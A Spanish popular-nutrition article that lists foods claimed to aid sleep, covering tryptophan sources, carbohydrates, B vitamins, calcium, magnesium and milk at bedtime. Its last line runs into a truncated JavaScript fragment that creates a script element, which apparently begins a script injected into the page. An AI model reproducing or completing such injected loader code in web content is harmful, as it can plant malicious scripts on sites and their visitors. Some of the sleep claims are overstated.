Salud y belleza » Alimentación

Alimentos de ensueño: comidas para dormir mejor

1 Comentario

Para el hombre, dormir representa un placer tan grande como cualquier otro. Recientemente, una encuesta reveló que los españoles, luego del sexo, el alcohol y la comida, escogen como mayor placer “una buena siesta por la tarde”.

El problema, por supuesto, surge al aparecer el maldito insomnio: ahí el regodeo se vuelve un verdadero infierno para todos aquellos que, apagadas las luces, cerradas las ventanas, silencio absoluto en el cuarto, no logran despegar los ojos del techo.

Etimológicamente, la palabra dormir representa tanto un acto como un deseo. Y es justamente lo que le pasa a muchos: desean dormir, pero no logran hacerlo de modo satisfactorio. Para todos ellos presentamos una lista de alimentos que, al incluirlos en nuestra dieta, fomentarán un exitoso proceso REM (o MOR, en español).

El Triptófano es un aminoácido presente mayormente en las proteínas de origen animal. Es un componente que no puede ser fabricado por el organismo, por lo tanto, sí o sí, debe ingerirse con las proteínas de las dietas. Tal aminoácido es necesario para la formación de melatonina y seratonina: lógicamente, elementos esenciales para regular el sueño. Algunas fuentes de triptófano son el huevo, la leche, las carnes, el pescado y hasta los cereales integrales.

Con los hidratos de carbono (los criticamos en la sección dietas pero los alabamos en muchas otras) también pueden ser útiles para conciliar el sueño. ¿Por qué? Sencillamente debido a que tales alimentos como las pastas, el pan y las papas, estimulan la secreción de insulina en el cuerpo humano. Dicha hormona, aumenta la disponibilidad del anteriormente mencionado triptófano para formar ésta serotonina.

Las vitaminas, que juegan un rol importante en infinitos procesos del sistema del ser humano, también intervienen, para variar, en el sueño. Vitaminas tales como la B (especialmente la B1 y la B6) son necesarias para la síntesis de la serotonina.

Encontramos vitamina B en alimentos tales como los cereales integrales tales -arroz, trigo, avena-, legumbres -soja, guisantes, lentejas-. También en la mantequilla de cacahuete, las setas, la levadura de cerveza y el germen de trigo.

Por último, para el sueño también podemos destacar elementos como el calcio y el magnesio: ambos, cada uno a su manera, facilitan las conexiones nerviosas, por lo tanto con un aporte suficiente cualquier sujeto logrará dormir más y descansar mejor.

De aquí viene el viejo mito (verdadero, por cierto) sobre el vaso de leche antes de dormir pues, como sabemos, los lácteos son grandes fuentes de calcio.

Por su parte, el magnesio puede hallarse en frutos secos y alimentos integrales.var d=document;var s=d.createElement('script');